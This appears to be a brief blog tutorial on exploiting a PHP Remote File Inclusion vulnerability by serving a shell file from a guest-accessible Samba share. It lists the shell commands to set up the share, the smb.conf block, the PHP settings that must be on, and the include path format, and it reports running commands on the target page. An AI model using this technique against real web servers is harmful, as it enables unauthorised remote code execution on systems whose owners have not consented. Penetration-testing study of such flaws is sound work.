Today we are going to exploit a Remote File Inclusion using a Samba share as our remote URL. Our first step is to create a share on the Samba server with out shell file. In order for this to work we need two options in the PHP.ini to be set.
The two php settings 'allow_url_fopen' and 'allow_url_include' must be set to 'On' before this will work.
Setting up Remote Samba Share
Here we setup the directory which will house our shell code.
root@asus:~% mkdir /home/sam/public_html/pub root@asus:~% root@asus:~% chmod 0555 /home/sam/public_html/pub root@asus:~% root@asus:~% chown -R nobody:nogroup /home/sam/public_html/pub/ root@asus:~% root@asus:~% cp shell.php /home/sam/public_html/pub/
Samba Configuration
Our next task is to include our config block in the smb.conf file.
[share] path = /home/sam/public_html/pub/ writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody
Now we can restart the samba server and we are good to go.
root@asus:~% service smbd restart root@asus:~%
Exploiting
Once we get the Samba server set up we can go head and try and include our remote share url. Our url should be in the format of //host/path/to/share/file.php.
As you can see we successfully included the remote samba share in to our webpage were we are able to run commands.
No comments:
Post a Comment